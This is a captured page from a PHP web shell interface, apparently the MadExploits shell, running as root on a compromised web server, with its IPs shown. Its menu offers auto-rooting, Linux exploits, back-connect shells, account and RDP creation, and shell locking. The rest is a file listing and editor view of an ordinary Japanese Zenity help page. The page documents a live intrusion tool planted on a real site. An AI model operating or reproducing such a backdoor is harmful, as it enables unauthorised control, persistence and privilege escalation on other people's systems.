Linux lorencats.com 5.10.103-v7l+ #1529 SMP Tue Mar 8 12:24:00 GMT 2022 armv7l
Apache/2.4.59 (Raspbian)
: 10.0.0.29 | : 216.73.216.10
Cant Read [ /etc/named.conf ]
7.3.31-1~deb10u7
root
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
help /
ja /
zenity /
[ HOME SHELL ]
Name
Size
Permission
Action
figures
[ DIR ]
drwxr-xr-x
calendar.page
2.84
KB
-rw-r--r--
color-selection.page
1.68
KB
-rw-r--r--
entry.page
2.07
KB
-rw-r--r--
error.page
1.09
KB
-rw-r--r--
file-selection.page
2.63
KB
-rw-r--r--
forms.page
2.86
KB
-rw-r--r--
index.page
1.07
KB
-rw-r--r--
info.page
1.13
KB
-rw-r--r--
intro.page
1.31
KB
-rw-r--r--
legal.xml
2.85
KB
-rw-r--r--
list.page
3.33
KB
-rw-r--r--
message.page
865
B
-rw-r--r--
notification.page
2.32
KB
-rw-r--r--
password.page
1.63
KB
-rw-r--r--
progress.page
2.74
KB
-rw-r--r--
question.page
1.06
KB
-rw-r--r--
scale.page
2.53
KB
-rw-r--r--
text.page
2.76
KB
-rw-r--r--
usage.page
9.8
KB
-rw-r--r--
warning.page
1.13
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : file-selection.page
<?xml version="1.0" encoding="utf-8"?> <page xmlns="http://projectmallard.org/1.0/" type="topic" id="file-selection" xml:lang="ja"> <info> <link type="guide" xref="index#dialogs"/> <desc><cmd>--file-selection</cmd> オプションの使用</desc> <mal:credit xmlns:mal="http://projectmallard.org/1.0/" type="translator copyright"> <mal:name>赤星 柔充</mal:name> <mal:email>yasumichi@vinelinux.org</mal:email> <mal:years>2011,2012</mal:years> </mal:credit> </info> <title>ファイル選択ダイアログ</title> <p>ファイル選択ダイアログを作成するには、<cmd>--file-selection</cmd> というオプションを使ってください。<app>Zenity</app> は、選択されたファイルあるいはフォルダーを標準出力へ返却します。ファイル選択ダイアログのデフォルトのモードは、開くです。</p> <p>ファイル選択ダイアログは、以下のオプションをサポートしています。</p> <terms> <item> <title><cmd>--filename</cmd>=<var>ファイル名</var></title> <p>ファイル選択ダイアログが最初に表示された時に選択されているファイルまたはフォルダーを指定します。</p> </item> <item> <title><cmd>--multiple</cmd></title> <p>ファイル選択ダイアログで複数ファイルの選択を可能にします。</p> </item> <item> <title><cmd>--directory</cmd></title> <p>ファイル選択ダイアログでフォルダーのみを選択可能にします。</p> </item> <item> <title><cmd>--save</cmd></title> <p>ファイル選択ダイアログを保存モードに設定します。</p> </item> <item> <title><cmd>--separator</cmd>=<var>セパレーター</var></title> <p>返却するファイル名の一覧を区切るのに使う文字を指定します。</p> </item> </terms> <p>以下のスクリプトの例でファイル選択ダイアログの作成方法を示します。</p> <code> #!/bin/sh FILE=`zenity --file-selection --title="ファイルの選択"` case $? in 0) echo "\"$FILE\" が選択されました。";; 1) echo "ファイルが選択されませんでした。";; -1) echo "予期せぬエラーが発生しました。";; esac </code> <figure> <title>ファイル選択ダイアログの例</title> <desc><app>Zenity</app> ファイル選択ダイアログの例</desc> <media type="image" mime="image/png" src="figures/zenity-fileselection-screenshot.png"/> </figure> </page>
Close